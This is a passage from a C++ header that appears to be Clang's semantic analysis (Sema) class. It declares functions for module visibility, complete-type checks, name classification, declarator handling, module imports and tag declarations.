CompleteTypeKind Kind, TypeDiagnoser *Diagnoser);
struct ModuleScope {
SourceLocation BeginLoc;
clang::Module *Module = nullptr;
bool ModuleInterface = false;
bool ImplicitGlobalModuleFragment = false;
VisibleModuleSet OuterVisibleModules;
};
/// The modules we're currently parsing.
llvm::SmallVector<ModuleScope, 16> ModuleScopes;
/// Namespace definitions that we will export when they finish.
llvm::SmallPtrSet<const NamespaceDecl*, 8> DeferredExportedNamespaces;
/// Get the module whose scope we are currently within.
Module *getCurrentModule() const {
return ModuleScopes.empty() ? nullptr : ModuleScopes.back().Module;
}
VisibleModuleSet VisibleModules;
public:
/// Get the module owning an entity.
Module *getOwningModule(const Decl *Entity) {
return Entity->getOwningModule();
}
/// Make a merged definition of an existing hidden definition \p ND
/// visible at the specified location.
void makeMergedDefinitionVisible(NamedDecl *ND);
bool isModuleVisible(const Module *M, bool ModulePrivate = false);
/// Determine whether a declaration is visible to name lookup.
bool isVisible(const NamedDecl *D) {
return !D->isHidden() || isVisibleSlow(D);
}
/// Determine whether any declaration of an entity is visible.
bool
hasVisibleDeclaration(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr) {
return isVisible(D) || hasVisibleDeclarationSlow(D, Modules);
}
bool hasVisibleDeclarationSlow(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules);
bool hasVisibleMergedDefinition(NamedDecl *Def);
bool hasMergedDefinitionInCurrentModule(NamedDecl *Def);
/// Determine if \p D and \p Suggested have a structurally compatible
/// layout as described in C11 6.2.7/1.
bool hasStructuralCompatLayout(Decl *D, Decl *Suggested);
/// Determine if \p D has a visible definition. If not, suggest a declaration
/// that should be made visible to expose the definition.
bool hasVisibleDefinition(NamedDecl *D, NamedDecl **Suggested,
bool OnlyNeedComplete = false);
bool hasVisibleDefinition(const NamedDecl *D) {
NamedDecl *Hidden;
return hasVisibleDefinition(const_cast<NamedDecl*>(D), &Hidden);
}
/// Determine if the template parameter \p D has a visible default argument.
bool
hasVisibleDefaultArgument(const NamedDecl *D,
llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is an explicit
/// specialization declaration for a specialization of a template. (For a
/// member specialization, use hasVisibleMemberSpecialization.)
bool hasVisibleExplicitSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if there is a visible declaration of \p D that is a member
/// specialization declaration (as opposed to an instantiated declaration).
bool hasVisibleMemberSpecialization(
const NamedDecl *D, llvm::SmallVectorImpl<Module *> *Modules = nullptr);
/// Determine if \p A and \p B are equivalent internal linkage declarations
/// from different modules, and thus an ambiguity error can be downgraded to
/// an extension warning.
bool isEquivalentInternalLinkageDeclaration(const NamedDecl *A,
const NamedDecl *B);
void diagnoseEquivalentInternalLinkageDeclarations(
SourceLocation Loc, const NamedDecl *D,
ArrayRef<const NamedDecl *> Equiv);
bool isUsualDeallocationFunction(const CXXMethodDecl *FD);
bool isCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind = CompleteTypeKind::Default) {
return !RequireCompleteTypeImpl(Loc, T, Kind, nullptr);
}
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, TypeDiagnoser &Diagnoser);
bool RequireCompleteType(SourceLocation Loc, QualType T,
CompleteTypeKind Kind, unsigned DiagID);
bool RequireCompleteType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, Diagnoser);
}
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID) {
return RequireCompleteType(Loc, T, CompleteTypeKind::Default, DiagID);
}
template <typename... Ts>
bool RequireCompleteType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteType(Loc, T, CompleteTypeKind::Normal, Diagnoser);
}
void completeExprArrayBound(Expr *E);
bool RequireCompleteExprType(Expr *E, CompleteTypeKind Kind,
TypeDiagnoser &Diagnoser);
bool RequireCompleteExprType(Expr *E, unsigned DiagID);
template <typename... Ts>
bool RequireCompleteExprType(Expr *E, unsigned DiagID, const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Default, Diagnoser);
}
template <typename... Ts>
bool RequireCompleteSizedExprType(Expr *E, unsigned DiagID,
const Ts &... Args) {
SizelessTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireCompleteExprType(E, CompleteTypeKind::Normal, Diagnoser);
}
bool RequireLiteralType(SourceLocation Loc, QualType T,
TypeDiagnoser &Diagnoser);
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID);
template <typename... Ts>
bool RequireLiteralType(SourceLocation Loc, QualType T, unsigned DiagID,
const Ts &...Args) {
BoundTypeDiagnoser<Ts...> Diagnoser(DiagID, Args...);
return RequireLiteralType(Loc, T, Diagnoser);
}
QualType getElaboratedType(ElaboratedTypeKeyword Keyword,
const CXXScopeSpec &SS, QualType T,
TagDecl *OwnedTagDecl = nullptr);
QualType BuildTypeofExprType(Expr *E, SourceLocation Loc);
/// If AsUnevaluated is false, E is treated as though it were an evaluated
/// context, such as when building a type for decltype(auto).
QualType BuildDecltypeType(Expr *E, SourceLocation Loc,
bool AsUnevaluated = true);
QualType BuildUnaryTransformType(QualType BaseType,
UnaryTransformType::UTTKind UKind,
SourceLocation Loc);
//===--------------------------------------------------------------------===//
// Symbol table / Decl tracking callbacks: SemaDecl.cpp.
//
struct SkipBodyInfo {
SkipBodyInfo()
: ShouldSkip(false), CheckSameAsPrevious(false), Previous(nullptr),
New(nullptr) {}
bool ShouldSkip;
bool CheckSameAsPrevious;
NamedDecl *Previous;
NamedDecl *New;
};
DeclGroupPtrTy ConvertDeclToDeclGroup(Decl *Ptr, Decl *OwnedType = nullptr);
void DiagnoseUseOfUnimplementedSelectors();
bool isSimpleTypeSpecifier(tok::TokenKind Kind) const;
ParsedType getTypeName(const IdentifierInfo &II, SourceLocation NameLoc,
Scope *S, CXXScopeSpec *SS = nullptr,
bool isClassName = false, bool HasTrailingDot = false,
ParsedType ObjectType = nullptr,
bool IsCtorOrDtorName = false,
bool WantNontrivialTypeSourceInfo = false,
bool IsClassTemplateDeductionContext = true,
IdentifierInfo **CorrectedII = nullptr);
TypeSpecifierType isTagName(IdentifierInfo &II, Scope *S);
bool isMicrosoftMissingTypename(const CXXScopeSpec *SS, Scope *S);
void DiagnoseUnknownTypeName(IdentifierInfo *&II,
SourceLocation IILoc,
Scope *S,
CXXScopeSpec *SS,
ParsedType &SuggestedType,
bool IsTemplateName = false);
/// Attempt to behave like MSVC in situations where lookup of an unqualified
/// type name has failed in a dependent context. In these situations, we
/// automatically form a DependentTypeName that will retry lookup in a related
/// scope during instantiation.
ParsedType ActOnMSVCUnknownTypeName(const IdentifierInfo &II,
SourceLocation NameLoc,
bool IsTemplateTypeArg);
/// Describes the result of the name lookup and resolution performed
/// by \c ClassifyName().
enum NameClassificationKind {
/// This name is not a type or template in this context, but might be
/// something else.
NC_Unknown,
/// Classification failed; an error has been produced.
NC_Error,
/// The name has been typo-corrected to a keyword.
NC_Keyword,
/// The name was classified as a type.
NC_Type,
/// The name was classified as a specific non-type, non-template
/// declaration. ActOnNameClassifiedAsNonType should be called to
/// convert the declaration to an expression.
NC_NonType,
/// The name was classified as an ADL-only function name.
/// ActOnNameClassifiedAsUndeclaredNonType should be called to convert the
/// result to an expression.
NC_UndeclaredNonType,
/// The name denotes a member of a dependent type that could not be
/// resolved. ActOnNameClassifiedAsDependentNonType should be called to
/// convert the result to an expression.
NC_DependentNonType,
/// The name was classified as a non-type, and an expression representing
/// that name has been formed.
NC_ContextIndependentExpr,
/// The name was classified as a template whose specializations are types.
NC_TypeTemplate,
/// The name was classified as a variable template name.
NC_VarTemplate,
/// The name was classified as a function template name.
NC_FunctionTemplate,
/// The name was classified as an ADL-only function template name.
NC_UndeclaredTemplate,
/// The name was classified as a concept name.
NC_Concept,
};
class NameClassification {
NameClassificationKind Kind;
union {
ExprResult Expr;
NamedDecl *NonTypeDecl;
TemplateName Template;
ParsedType Type;
};
explicit NameClassification(NameClassificationKind Kind) : Kind(Kind) {}
public:
NameClassification(ParsedType Type) : Kind(NC_Type), Type(Type) {}
NameClassification(const IdentifierInfo *Keyword) : Kind(NC_Keyword) {}
static NameClassification Error() {
return NameClassification(NC_Error);
}
static NameClassification Unknown() {
return NameClassification(NC_Unknown);
}
static NameClassification ContextIndependentExpr(ExprResult E) {
NameClassification Result(NC_ContextIndependentExpr);
Result.Expr = E;
return Result;
}
static NameClassification NonType(NamedDecl *D) {
NameClassification Result(NC_NonType);
Result.NonTypeDecl = D;
return Result;
}
static NameClassification UndeclaredNonType() {
return NameClassification(NC_UndeclaredNonType);
}
static NameClassification DependentNonType() {
return NameClassification(NC_DependentNonType);
}
static NameClassification TypeTemplate(TemplateName Name) {
NameClassification Result(NC_TypeTemplate);
Result.Template = Name;
return Result;
}
static NameClassification VarTemplate(TemplateName Name) {
NameClassification Result(NC_VarTemplate);
Result.Template = Name;
return Result;
}
static NameClassification FunctionTemplate(TemplateName Name) {
NameClassification Result(NC_FunctionTemplate);
Result.Template = Name;
return Result;
}
static NameClassification Concept(TemplateName Name) {
NameClassification Result(NC_Concept);
Result.Template = Name;
return Result;
}
static NameClassification UndeclaredTemplate(TemplateName Name) {
NameClassification Result(NC_UndeclaredTemplate);
Result.Template = Name;
return Result;
}
NameClassificationKind getKind() const { return Kind; }
ExprResult getExpression() const {
assert(Kind == NC_ContextIndependentExpr);
return Expr;
}
ParsedType getType() const {
assert(Kind == NC_Type);
return Type;
}
NamedDecl *getNonTypeDecl() const {
assert(Kind == NC_NonType);
return NonTypeDecl;
}
TemplateName getTemplateName() const {
assert(Kind == NC_TypeTemplate || Kind == NC_FunctionTemplate ||
Kind == NC_VarTemplate || Kind == NC_Concept ||
Kind == NC_UndeclaredTemplate);
return Template;
}
TemplateNameKind getTemplateNameKind() const {
switch (Kind) {
case NC_TypeTemplate:
return TNK_Type_template;
case NC_FunctionTemplate:
return TNK_Function_template;
case NC_VarTemplate:
return TNK_Var_template;
case NC_Concept:
return TNK_Concept_template;
case NC_UndeclaredTemplate:
return TNK_Undeclared_template;
default:
llvm_unreachable("unsupported name classification.");
}
}
};
/// Perform name lookup on the given name, classifying it based on
/// the results of name lookup and the following token.
///
/// This routine is used by the parser to resolve identifiers and help direct
/// parsing. When the identifier cannot be found, this routine will attempt
/// to correct the typo and classify based on the resulting name.
///
/// \param S The scope in which we're performing name lookup.
///
/// \param SS The nested-name-specifier that precedes the name.
///
/// \param Name The identifier. If typo correction finds an alternative name,
/// this pointer parameter will be updated accordingly.
///
/// \param NameLoc The location of the identifier.
///
/// \param NextToken The token following the identifier. Used to help
/// disambiguate the name.
///
/// \param CCC The correction callback, if typo correction is desired.
NameClassification ClassifyName(Scope *S, CXXScopeSpec &SS,
IdentifierInfo *&Name, SourceLocation NameLoc,
const Token &NextToken,
CorrectionCandidateCallback *CCC = nullptr);
/// Act on the result of classifying a name as an undeclared (ADL-only)
/// non-type declaration.
ExprResult ActOnNameClassifiedAsUndeclaredNonType(IdentifierInfo *Name,
SourceLocation NameLoc);
/// Act on the result of classifying a name as an undeclared member of a
/// dependent base class.
ExprResult ActOnNameClassifiedAsDependentNonType(const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation NameLoc,
bool IsAddressOfOperand);
/// Act on the result of classifying a name as a specific non-type
/// declaration.
ExprResult ActOnNameClassifiedAsNonType(Scope *S, const CXXScopeSpec &SS,
NamedDecl *Found,
SourceLocation NameLoc,
const Token &NextToken);
/// Describes the detailed kind of a template name. Used in diagnostics.
enum class TemplateNameKindForDiagnostics {
ClassTemplate,
FunctionTemplate,
VarTemplate,
AliasTemplate,
TemplateTemplateParam,
Concept,
DependentTemplate
};
TemplateNameKindForDiagnostics
getTemplateNameKindForDiagnostics(TemplateName Name);
/// Determine whether it's plausible that E was intended to be a
/// template-name.
bool mightBeIntendedToBeTemplateName(ExprResult E, bool &Dependent) {
if (!getLangOpts().CPlusPlus || E.isInvalid())
return false;
Dependent = false;
if (auto *DRE = dyn_cast<DeclRefExpr>(E.get()))
return !DRE->hasExplicitTemplateArgs();
if (auto *ME = dyn_cast<MemberExpr>(E.get()))
return !ME->hasExplicitTemplateArgs();
Dependent = true;
if (auto *DSDRE = dyn_cast<DependentScopeDeclRefExpr>(E.get()))
return !DSDRE->hasExplicitTemplateArgs();
if (auto *DSME = dyn_cast<CXXDependentScopeMemberExpr>(E.get()))
return !DSME->hasExplicitTemplateArgs();
// Any additional cases recognized here should also be handled by
// diagnoseExprIntendedAsTemplateName.
return false;
}
void diagnoseExprIntendedAsTemplateName(Scope *S, ExprResult TemplateName,
SourceLocation Less,
SourceLocation Greater);
Decl *ActOnDeclarator(Scope *S, Declarator &D);
NamedDecl *HandleDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParameterLists);
void RegisterLocallyScopedExternCDecl(NamedDecl *ND, Scope *S);
bool DiagnoseClassNameShadow(DeclContext *DC, DeclarationNameInfo Info);
bool diagnoseQualifiedDeclaration(CXXScopeSpec &SS, DeclContext *DC,
DeclarationName Name, SourceLocation Loc,
bool IsTemplateId);
void
diagnoseIgnoredQualifiers(unsigned DiagID, unsigned Quals,
SourceLocation FallbackLoc,
SourceLocation ConstQualLoc = SourceLocation(),
SourceLocation VolatileQualLoc = SourceLocation(),
SourceLocation RestrictQualLoc = SourceLocation(),
SourceLocation AtomicQualLoc = SourceLocation(),
SourceLocation UnalignedQualLoc = SourceLocation());
void diagnosePointerAuthDisabled(SourceLocation loc, SourceRange range);
bool checkConstantPointerAuthKey(Expr *keyExpr, unsigned &key);
static bool adjustContextForLocalExternDecl(DeclContext *&DC);
void DiagnoseFunctionSpecifiers(const DeclSpec &DS);
NamedDecl *getShadowedDeclaration(const TypedefNameDecl *D,
const LookupResult &R);
NamedDecl *getShadowedDeclaration(const VarDecl *D, const LookupResult &R);
void CheckShadow(NamedDecl *D, NamedDecl *ShadowedDecl,
const LookupResult &R);
void CheckShadow(Scope *S, VarDecl *D);
/// Warn if 'E', which is an expression that is about to be modified, refers
/// to a shadowing declaration.
void CheckShadowingDeclModification(Expr *E, SourceLocation Loc);
void DiagnoseShadowingLambdaDecls(const sema::LambdaScopeInfo *LSI);
private:
/// Map of current shadowing declarations to shadowed declarations. Warn if
/// it looks like the user is trying to modify the shadowing declaration.
llvm::DenseMap<const NamedDecl *, const NamedDecl *> ShadowingDecls;
public:
void CheckCastAlign(Expr *Op, QualType T, SourceRange TRange);
void handleTagNumbering(const TagDecl *Tag, Scope *TagScope);
void setTagNameForLinkagePurposes(TagDecl *TagFromDeclSpec,
TypedefNameDecl *NewTD);
void CheckTypedefForVariablyModifiedType(Scope *S, TypedefNameDecl *D);
NamedDecl* ActOnTypedefDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous);
NamedDecl* ActOnTypedefNameDecl(Scope* S, DeclContext* DC, TypedefNameDecl *D,
LookupResult &Previous, bool &Redeclaration);
NamedDecl *ActOnVariableDeclarator(Scope *S, Declarator &D, DeclContext *DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope,
ArrayRef<BindingDecl *> Bindings = None);
NamedDecl *
ActOnDecompositionDeclarator(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists);
// Returns true if the variable declaration is a redeclaration
bool CheckVariableDeclaration(VarDecl *NewVD, LookupResult &Previous);
void CheckVariableDeclarationType(VarDecl *NewVD);
bool DeduceVariableDeclarationType(VarDecl *VDecl, bool DirectInit,
Expr *Init);
void CheckCompleteVariableDeclaration(VarDecl *VD);
void CheckCompleteDecompositionDeclaration(DecompositionDecl *DD);
void MaybeSuggestAddingStaticToDecl(const FunctionDecl *D);
NamedDecl* ActOnFunctionDeclarator(Scope* S, Declarator& D, DeclContext* DC,
TypeSourceInfo *TInfo,
LookupResult &Previous,
MultiTemplateParamsArg TemplateParamLists,
bool &AddToScope);
bool AddOverriddenMethods(CXXRecordDecl *DC, CXXMethodDecl *MD);
enum class CheckConstexprKind {
/// Diagnose issues that are non-constant or that are extensions.
Diagnose,
/// Identify whether this function satisfies the formal rules for constexpr
/// functions in the current lanugage mode (with no extensions).
CheckValid
};
bool CheckConstexprFunctionDefinition(const FunctionDecl *FD,
CheckConstexprKind Kind);
void DiagnoseHiddenVirtualMethods(CXXMethodDecl *MD);
void FindHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
void NoteHiddenVirtualMethods(CXXMethodDecl *MD,
SmallVectorImpl<CXXMethodDecl*> &OverloadedMethods);
// Returns true if the function declaration is a redeclaration
bool CheckFunctionDeclaration(Scope *S,
FunctionDecl *NewFD, LookupResult &Previous,
bool IsMemberSpecialization);
bool shouldLinkDependentDeclWithPrevious(Decl *D, Decl *OldDecl);
bool canFullyTypeCheckRedeclaration(ValueDecl *NewD, ValueDecl *OldD,
QualType NewT, QualType OldT);
void CheckMain(FunctionDecl *FD, const DeclSpec &D);
void CheckMSVCRTEntryPoint(FunctionDecl *FD);
Attr *getImplicitCodeSegOrSectionAttrForFunction(const FunctionDecl *FD,
bool IsDefinition);
void CheckFunctionOrTemplateParamDeclarator(Scope *S, Declarator &D);
Decl *ActOnParamDeclarator(Scope *S, Declarator &D);
ParmVarDecl *BuildParmVarDeclForTypedef(DeclContext *DC,
SourceLocation Loc,
QualType T);
QualType adjustParameterTypeForObjCAutoRefCount(QualType T,
SourceLocation NameLoc,
TypeSourceInfo *TSInfo);
ParmVarDecl *CheckParameter(DeclContext *DC, SourceLocation StartLoc,
SourceLocation NameLoc, IdentifierInfo *Name,
QualType T, TypeSourceInfo *TSInfo,
StorageClass SC);
void ActOnParamDefaultArgument(Decl *param,
SourceLocation EqualLoc,
Expr *defarg);
void ActOnParamUnparsedDefaultArgument(Decl *param,
SourceLocation EqualLoc,
SourceLocation ArgLoc);
void ActOnParamDefaultArgumentError(Decl *param, SourceLocation EqualLoc);
bool SetParamDefaultArgument(ParmVarDecl *Param, Expr *DefaultArg,
SourceLocation EqualLoc);
// Contexts where using non-trivial C union types can be disallowed. This is
// passed to err_non_trivial_c_union_in_invalid_context.
enum NonTrivialCUnionContext {
// Function parameter.
NTCUC_FunctionParam,
// Function return.
NTCUC_FunctionReturn,
// Default-initialized object.
NTCUC_DefaultInitializedObject,
// Variable with automatic storage duration.
NTCUC_AutoVar,
// Initializer expression that might copy from another object.
NTCUC_CopyInit,
// Assignment.
NTCUC_Assignment,
// Compound literal.
NTCUC_CompoundLiteral,
// Block capture.
NTCUC_BlockCapture,
// lvalue-to-rvalue conversion of volatile type.
NTCUC_LValueToRValueVolatile,
};
/// Emit diagnostics if the initializer or any of its explicit or
/// implicitly-generated subexpressions require copying or
/// default-initializing a type that is or contains a C union type that is
/// non-trivial to copy or default-initialize.
void checkNonTrivialCUnionInInitializer(const Expr *Init, SourceLocation Loc);
// These flags are passed to checkNonTrivialCUnion.
enum NonTrivialCUnionKind {
NTCUK_Init = 0x1,
NTCUK_Destruct = 0x2,
NTCUK_Copy = 0x4,
};
/// Emit diagnostics if a non-trivial C union type or a struct that contains
/// a non-trivial C union is used in an invalid context.
void checkNonTrivialCUnion(QualType QT, SourceLocation Loc,
NonTrivialCUnionContext UseContext,
unsigned NonTrivialKind);
void AddInitializerToDecl(Decl *dcl, Expr *init, bool DirectInit);
void ActOnUninitializedDecl(Decl *dcl);
void ActOnInitializerError(Decl *Dcl);
void ActOnPureSpecifier(Decl *D, SourceLocation PureSpecLoc);
void ActOnCXXForRangeDecl(Decl *D);
StmtResult ActOnCXXForRangeIdentifier(Scope *S, SourceLocation IdentLoc,
IdentifierInfo *Ident,
ParsedAttributes &Attrs,
SourceLocation AttrEnd);
void SetDeclDeleted(Decl *dcl, SourceLocation DelLoc);
void SetDeclDefaulted(Decl *dcl, SourceLocation DefaultLoc);
void CheckStaticLocalForDllExport(VarDecl *VD);
void FinalizeDeclaration(Decl *D);
DeclGroupPtrTy FinalizeDeclaratorGroup(Scope *S, const DeclSpec &DS,
ArrayRef<Decl *> Group);
DeclGroupPtrTy BuildDeclaratorGroup(MutableArrayRef<Decl *> Group);
/// Should be called on all declarations that might have attached
/// documentation comments.
void ActOnDocumentableDecl(Decl *D);
void ActOnDocumentableDecls(ArrayRef<Decl *> Group);
void ActOnFinishKNRParamDeclarations(Scope *S, Declarator &D,
SourceLocation LocAfterDecls);
void CheckForFunctionRedefinition(
FunctionDecl *FD, const FunctionDecl *EffectiveDefinition = nullptr,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Declarator &D,
MultiTemplateParamsArg TemplateParamLists,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnStartOfFunctionDef(Scope *S, Decl *D,
SkipBodyInfo *SkipBody = nullptr);
void ActOnStartTrailingRequiresClause(Scope *S, Declarator &D);
ExprResult ActOnFinishTrailingRequiresClause(ExprResult ConstraintExpr);
void ActOnStartOfObjCMethodDef(Scope *S, Decl *D);
bool isObjCMethodDecl(Decl *D) {
return D && isa<ObjCMethodDecl>(D);
}
/// Determine whether we can delay parsing the body of a function or
/// function template until it is used, assuming we don't care about emitting
/// code for that function.
///
/// This will be \c false if we may need the body of the function in the
/// middle of parsing an expression (where it's impractical to switch to
/// parsing a different function), for instance, if it's constexpr in C++11
/// or has an 'auto' return type in C++14. These cases are essentially bugs.
bool canDelayFunctionBody(const Declarator &D);
/// Determine whether we can skip parsing the body of a function
/// definition, assuming we don't care about analyzing its body or emitting
/// code for that function.
///
/// This will be \c false only if we may need the body of the function in
/// order to parse the rest of the program (for instance, if it is
/// \c constexpr in C++11 or has an 'auto' return type in C++14).
bool canSkipFunctionBody(Decl *D);
void computeNRVO(Stmt *Body, sema::FunctionScopeInfo *Scope);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body);
Decl *ActOnFinishFunctionBody(Decl *Decl, Stmt *Body, bool IsInstantiation);
Decl *ActOnSkippedFunctionBody(Decl *Decl);
void ActOnFinishInlineFunctionDef(FunctionDecl *D);
/// ActOnFinishDelayedAttribute - Invoked when we have finished parsing an
/// attribute for which parsing is delayed.
void ActOnFinishDelayedAttribute(Scope *S, Decl *D, ParsedAttributes &Attrs);
/// Diagnose any unused parameters in the given sequence of
/// ParmVarDecl pointers.
void DiagnoseUnusedParameters(ArrayRef<ParmVarDecl *> Parameters);
/// Diagnose whether the size of parameters or return value of a
/// function or obj-c method definition is pass-by-value and larger than a
/// specified threshold.
void
DiagnoseSizeOfParametersAndReturnValue(ArrayRef<ParmVarDecl *> Parameters,
QualType ReturnTy, NamedDecl *D);
void DiagnoseInvalidJumps(Stmt *Body);
Decl *ActOnFileScopeAsmDecl(Expr *expr,
SourceLocation AsmLoc,
SourceLocation RParenLoc);
/// Handle a C++11 empty-declaration and attribute-declaration.
Decl *ActOnEmptyDeclaration(Scope *S, const ParsedAttributesView &AttrList,
SourceLocation SemiLoc);
enum class ModuleDeclKind {
Interface, ///< 'export module X;'
Implementation, ///< 'module X;'
};
/// The parser has processed a module-declaration that begins the definition
/// of a module interface or implementation.
DeclGroupPtrTy ActOnModuleDecl(SourceLocation StartLoc,
SourceLocation ModuleLoc, ModuleDeclKind MDK,
ModuleIdPath Path, bool IsFirstDecl);
/// The parser has processed a global-module-fragment declaration that begins
/// the definition of the global module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
DeclGroupPtrTy ActOnGlobalModuleFragmentDecl(SourceLocation ModuleLoc);
/// The parser has processed a private-module-fragment declaration that begins
/// the definition of the private module fragment of the current module unit.
/// \param ModuleLoc The location of the 'module' keyword.
/// \param PrivateLoc The location of the 'private' keyword.
DeclGroupPtrTy ActOnPrivateModuleFragmentDecl(SourceLocation ModuleLoc,
SourceLocation PrivateLoc);
/// The parser has processed a module import declaration.
///
/// \param StartLoc The location of the first token in the declaration. This
/// could be the location of an '@', 'export', or 'import'.
/// \param ExportLoc The location of the 'export' keyword, if any.
/// \param ImportLoc The location of the 'import' keyword.
/// \param Path The module access path.
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, ModuleIdPath Path);
DeclResult ActOnModuleImport(SourceLocation StartLoc,
SourceLocation ExportLoc,
SourceLocation ImportLoc, Module *M,
ModuleIdPath Path = {});
/// The parser has processed a module import translated from a
/// #include or similar preprocessing directive.
void ActOnModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
void BuildModuleInclude(SourceLocation DirectiveLoc, Module *Mod);
/// The parsed has entered a submodule.
void ActOnModuleBegin(SourceLocation DirectiveLoc, Module *Mod);
/// The parser has left a submodule.
void ActOnModuleEnd(SourceLocation DirectiveLoc, Module *Mod);
/// Create an implicit import of the given module at the given
/// source location, for error recovery, if possible.
///
/// This routine is typically used when an entity found by name lookup
/// is actually hidden within a module that we know about but the user
/// has forgotten to import.
void createImplicitModuleImportForErrorRecovery(SourceLocation Loc,
Module *Mod);
/// Kinds of missing import. Note, the values of these enumerators correspond
/// to %select values in diagnostics.
enum class MissingImportKind {
Declaration,
Definition,
DefaultArgument,
ExplicitSpecialization,
PartialSpecialization
};
/// Diagnose that the specified declaration needs to be visible but
/// isn't, and suggest a module import that would resolve the problem.
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
MissingImportKind MIK, bool Recover = true);
void diagnoseMissingImport(SourceLocation Loc, NamedDecl *Decl,
SourceLocation DeclLoc, ArrayRef<Module *> Modules,
MissingImportKind MIK, bool Recover);
Decl *ActOnStartExportDecl(Scope *S, SourceLocation ExportLoc,
SourceLocation LBraceLoc);
Decl *ActOnFinishExportDecl(Scope *S, Decl *ExportDecl,
SourceLocation RBraceLoc);
/// We've found a use of a templated declaration that would trigger an
/// implicit instantiation. Check that any relevant explicit specializations
/// and partial specializations are visible, and diagnose if not.
void checkSpecializationVisibility(SourceLocation Loc, NamedDecl *Spec);
/// We've found a use of a template specialization that would select a
/// partial specialization. Check that the partial specialization is visible,
/// and diagnose if not.
void checkPartialSpecializationVisibility(SourceLocation Loc,
NamedDecl *Spec);
/// Retrieve a suitable printing policy for diagnostics.
PrintingPolicy getPrintingPolicy() const {
return getPrintingPolicy(Context, PP);
}
/// Retrieve a suitable printing policy for diagnostics.
static PrintingPolicy getPrintingPolicy(const ASTContext &Ctx,
const Preprocessor &PP);
/// Scope actions.
void ActOnPopScope(SourceLocation Loc, Scope *S);
void ActOnTranslationUnitScope(Scope *S);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
RecordDecl *&AnonRecord);
Decl *ParsedFreeStandingDeclSpec(Scope *S, AccessSpecifier AS, DeclSpec &DS,
MultiTemplateParamsArg TemplateParams,
bool IsExplicitInstantiation,
RecordDecl *&AnonRecord);
Decl *BuildAnonymousStructOrUnion(Scope *S, DeclSpec &DS,
AccessSpecifier AS,
RecordDecl *Record,
const PrintingPolicy &Policy);
Decl *BuildMicrosoftCAnonymousStruct(Scope *S, DeclSpec &DS,
RecordDecl *Record);
/// Common ways to introduce type names without a tag for use in diagnostics.
/// Keep in sync with err_tag_reference_non_tag.
enum NonTagKind {
NTK_NonStruct,
NTK_NonClass,
NTK_NonUnion,
NTK_NonEnum,
NTK_Typedef,
NTK_TypeAlias,
NTK_Template,
NTK_TypeAliasTemplate,
NTK_TemplateTemplateArgument,
};
/// Given a non-tag type declaration, returns an enum useful for indicating
/// what kind of non-tag type this is.
NonTagKind getNonTagTypeDeclKind(const Decl *D, TagTypeKind TTK);
bool isAcceptableTagRedeclaration(const TagDecl *Previous,
TagTypeKind NewTag, bool isDefinition,
SourceLocation NewTagLoc,
const IdentifierInfo *Name);
enum TagUseKind {
TUK_Reference, // Reference to a tag: 'struct foo *X;'
TUK_Declaration, // Fwd decl of a tag: 'struct foo;'
TUK_Definition, // Definition of a tag: 'struct foo { int X; } Y;'
TUK_Friend // Friend declaration: 'friend struct foo;'
};
Decl *ActOnTag(Scope *S, unsigned TagSpec, TagUseKind TUK,
SourceLocation KWLoc, CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc, const ParsedAttributesView &Attr,
AccessSpecifier AS, SourceLocation ModulePrivateLoc,
MultiTemplateParamsArg TemplateParameterLists, bool &OwnedDecl,
bool &IsDependent, SourceLocation ScopedEnumKWLoc,
bool ScopedEnumUsesClassTag, TypeResult UnderlyingType,
bool IsTypeSpecifier, bool IsTemplateParamOrArg,
SkipBodyInfo *SkipBody = nullptr);
Decl *ActOnTemplatedFriendTag(Scope *S, SourceLocation FriendLoc,
unsigned TagSpec, SourceLocation TagLoc,
CXXScopeSpec &SS, IdentifierInfo *Name,
SourceLocation NameLoc,
const ParsedAttributesView &Attr,
MultiTemplateParamsArg TempParamLists);
TypeResult ActOnDependentTag(Scope *S,
unsigned TagSpec,
TagUseKind TUK,
const CXXScopeSpec &SS,
IdentifierInfo *Name,
SourceLocation TagLoc,
SourceLocation NameLoc);
void ActOnDefs(Scope *S, Decl *TagD, SourceLocation DeclStart,
IdentifierInfo *ClassName,
SmallVectorImpl<Decl *> &Decls);
